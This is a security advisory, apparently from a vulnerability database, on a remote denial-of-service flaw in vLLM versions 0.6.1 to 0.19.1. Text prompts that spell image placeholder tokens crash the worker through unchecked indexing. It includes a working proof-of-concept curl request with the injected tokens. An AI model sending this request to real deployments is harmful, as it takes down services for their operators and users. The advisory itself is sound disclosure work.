An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_

Moderate CVSS: 6.5 EPSS: 0.00039% (0.11742 Percentile) EPSS:

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Affected Packages Affected Versions Fixed Versions
pypi:vllm
PURL: pkg:pypi/vllm
>= 0.6.1, < 0.20.0 0.20.0
46 Dependent packages
5 Dependent repositories
7,408,760 Downloads last month

Affected Version Ranges

All affected versions

0.6.1, 0.6.2, 0.6.3, 0.6.3.post1, 0.6.4, 0.6.4.post1, 0.6.5, 0.6.6, 0.6.6.post1, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5, 0.8.5.post1, 0.9.0, 0.9.0.1, 0.9.1, 0.9.2, 0.10.0, 0.10.1, 0.10.1.1, 0.10.2, 0.11.0, 0.11.1, 0.11.2, 0.12.0, 0.13.0, 0.14.0, 0.14.1, 0.15.0, 0.15.1, 0.16.0, 0.17.0, 0.17.1, 0.18.0, 0.18.1, 0.19.0, 0.19.1

All unaffected versions

0.0.1, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.2.0, 0.2.1, 0.2.1.post1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.4.0, 0.4.0.post1, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.5.0.post1, 0.5.1, 0.5.2, 0.5.3, 0.5.3.post1, 0.5.4, 0.5.5, 0.6.0, 0.6.1.post1, 0.6.1.post2, 0.20.0, 0.20.1, 0.20.2

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

  • Affected component: multimodal input position computation.
  • File/functions (paths are indicative):
    • vllm/model_executor/layers/rotary_embedding.py
      • get_input_positions_tensor(...)
      • _vl_get_input_positions_tensor(...)
  • Failure mechanism:
    • The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
    • When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

  • vLLM: 0.10.0
  • Model: Qwen/Qwen2.5-VL-3B-Instruct
  • Launch server:
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

  • HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
  • In some deployments, the worker exits and capacity remains reduced until manual restart.

Impact

  • Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
  • Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
  • Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

Fixes

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

References: